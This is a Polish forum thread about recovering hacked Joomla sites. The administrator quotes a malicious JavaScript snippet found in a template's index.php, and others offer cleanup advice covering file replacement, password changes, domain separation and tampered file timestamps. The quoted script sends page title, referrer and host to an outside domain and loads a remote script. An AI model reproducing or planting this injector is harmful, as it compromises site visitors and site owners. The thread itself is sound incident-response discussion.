Złośliwy kod w index.php a data pliku bez zmian?

[ded]

Problemy z joomlą zaczęły mi się odkąd pojawiły się ostatnie 0-day. Moja wina, bo niektóre strony nie były aktualizowane. Poszyściłem, poprzywracałem zdrowe kopie, zaktualizowałem do najnowszej wersji i znów to samo... Już mi ręce opadają więc może mi pomożecie.

W pliku index.php templatki mam wstrzyknięty kod typu:

Kod PHP:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.designer-beds.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script> 


Pliki jednak mają datę i godzinę dokładnie tą, w której edytowałem je aby wyczyścić. Wydaje mi się to conajmniej dziwne.

Zostało mi kilka joomli, których nie zdążyłem zaktualizować, ale wyłączyłem te domeny i nie da rady dostać się do nich przez żaden url, więc założyłem że mogą tak leżeć puki nie będę miał czasu na migrację.

Gdzie i w jaki sposób szukać problemu?

[damianoo]

Walczyłem z tym samym problemem. Prawdopodobnie przyczyną jest jakiś komponent lub moduł. Wgrałem wszystkie nowe pliki i problem się na szczęście rozwiązał. Za nim wziąłem się za poprawianie plików to usunąłem Total Comandera i zainstalowałem filezilla. Ponadto kupiłem antywirusa GData Total Protection i przeskanowałem komputer. A jak na początku wspomniałem potem wgrałem nowe pliki joomli, komponentów i modułów. Zmieniłem wszystkie hasła i na chwilę obecną od 2 tygodni jest po problemie.

[ded]

Tylko, że ja mam z 15 joomli + kilka wordpressów i to jest trochę roboty. Boję się też, że nadpisanie plików nie wystarczy i trzeba będzie szukać oddzielnego pliku ze złośliwym kodem. Na razie po logach obczaiłem którą stronę ciągle atakują mi ruski boty. Dzięki za radę, będę próbował.

[damianoo]

Ja też miałem kilkanaście Joomli, ale po logach doszedłem do tego od której zaczął się problem. Walczyłem z tym kilka miesięcy i się udało. A teraz jestem o nowe doświadczenia mądrzejszy. Zablokuj sobie Rosję i Azję oraz wszystko oprócz google w pliku .htaccess

[zwiastun]

Boję się też, że nadpisanie plików nie wystarczy i trzeba będzie szukać oddzielnego pliku ze złośliwym kodem.

Drogi Kolego! Nie obraź się, bo nie po to piszę, by Ci sprawić przykrość, tylko by dosadnie Ci uświadomić TWOJE ZADANIE I ODPOWIEDZIALNOŚĆ.
Jeśli zarządzasz tyloma witrynami, to powinieneś mieć przynajmniej świadomość zagrożeń, jakie niesie za sobą Internet oraz ogólną wiedzę o tym, jak postępować po włamaniu.
Gdybyś tę wiedzę miał, nie pisałbyś takich dyrdymałów, na które nawet początkujący użytkownik nie powinien sobie pozwolić.

Nic Ci nie pomoże ani zaktualizowanie Joomla, ani nadpisanie plików, w których znalazłeś kod.
Postępowanie po włamaniu zostało opisane bardzo dokładnie na joomla.pl, ogólniej na wiki.joomla.pl, a ponadto w dziesiątkach postów i odpowiedzi na forum.
Krótko:
1. musisz wykryć, w jaki sposób dokonano włamania (bo inaczej nie usuniesz przyczyny).
2. musisz usunąć przyczynę.
3. musisz wykryć i usunąć wszystkie obce ingerencje w system plików (i być może bazy danych)
4. musisz zabezpieczyć witryny.

[Gall Anonim]

Ruch nr 1 separacja wszystkich domen (inaczej zawirusowana będzie atakować wyczyszczoną)
Ruch nr 2 zmiana wszystkich haseł
Ruch nr 3 zabranie się za porządki :-)

[ded]

@Zwiastun, wierzę że większość osób która tu przychodzi nie czyta zanim zada pytanie. Ja zrobiłem inaczej ale matetiały które znalazłem są za bardzo ogólne, zupełnie brak przykładów i niestety zmuszony byłem zapytać. Nie traktuj mnie protekcjonalnie. Piszesz o usunięciu ingerencji w system plików. Odkąd zaczęły się problemy codziennie odpytywałem serwer o zmienione pliki i analizowałem czy coś nie przybyło. Okazuje się, że daty plików mówią, że nie a w plikach jest złośliwy kod. Uznałem, że mnie to przerasta i dalatego zapytałem. Nie liczę na rozwiązanie "na tacy". Nie chcę się usprawiedliwiać bo włam jest zapewne przez moje zaniedbanie, w sumie jak 99%

@Gall, piszesz o separacji domen. Mam hosting w Progreso. Jak mogę to zrobić. Gdybym namierzył konkretną stronę która powoduje problem to opanowanie tego byłoby dużo łatwiejsze. Strony nie są mocno rozbudowane, dysponuję kopiami ale to także nie jest sposób rozwiązania. Podeślesz mi jakieś konretne info jak mozna odseparować strony?

Zablokuj sobie Rosję i Azję oraz wszystko oprócz google w pliku .htaccess

Moge prosić o jakiś przykład, np Twój plik?

[Gall Anonim]

Separacja katalogu parkowania domeny odbywa się z wykorzystaniem parametru open_basedir i odpowiednimi zmiennymi do tego parametru - nie mam zielonego pojęcia w jaki sposób jest uruchamiana na progresso ponieważ jest to zależne od konfiguracji serwera dostawcy n.p linuxpl.com (zresztą mój ulubiony dostawca) wykonuje to sam na prośbę mailową klienta, nazwa.pl nie udostępnia takiej możliwości w ogóle, home.pl ma dostępną opcję w panelu klienta - a jak ma progresso - nie mam pojęcia :-) Pytanie więc do obsługi progresso :-)

- - - Updated - - -

Jeszcze jedno - data modyfikacji pliku przy dobrze napisanym skrypcie atakującym nie jest wykładnią ponieważ pliki do których zostaje dodany kod mają zachowaną datę orginalną a pliki dodane po za rdzeniem otrzymują datę założenia katalogu. Osoby piszące takie skrypty mają naprawdę dużą wiedzę i umiejętności oraz doskonale orientują się w metodach naprawy więc starają również po stronie swojej przeciwdziałać wykrywaniu daną metodą. Tak więc obecnie w wielu przypadkach weryfikację po dacie można sobie o kant ...... potłuc.
Pzdr

[ded]

Dzięki, myślałem że sam to muszę zrobić. Zapytam zaraz.

Wysłane z mojego ONE A2003 przy użyciu Tapatalka

[damianoo]

Mam pytanie, jaki hosting wybrać z separacją? linuxpl czy może home.pl ?